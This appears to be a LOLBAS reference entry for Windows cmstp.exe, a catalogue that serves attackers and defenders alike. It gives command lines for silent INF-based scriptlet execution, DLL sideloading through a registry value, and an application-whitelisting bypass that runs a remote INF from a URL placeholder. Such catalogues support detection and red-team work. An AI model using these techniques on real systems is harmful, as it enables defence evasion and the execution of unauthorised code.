.. /Cmstp.exe
Star

Execute (INF, DLL, Registry Change)
AWL bypass (INF, Remote)

Installs or removes a Connection Manager service profile.

Paths:

Resources:

Acknowledgements:

Detections:

Execute

  1. Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

    cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
    Use case

    Execute code hidden within an inf file. Download and run scriptlets from internet.

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218.003
    Tags
    Execute: INF
  2. cmstp.exe reads the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll registry value and passes its data directly to LoadLibrary. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via cmstp.exe.

    cmstp.exe /nf
    Use case

    Proxy execution of a malicious DLL via registry modification.

    Privileges required
    Administrator
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1218.003
    Tags
    Execute: DLL
    Requires: Registry Change

AWL bypass

  1. Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

    cmstp.exe /ni /s {REMOTEURL:.inf}
    Use case

    Execute code hidden within an inf file. Execute code directly from Internet.

    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    ATT&CK® technique
    T1218.003
    Tags
    Execute: INF
    Execute: Remote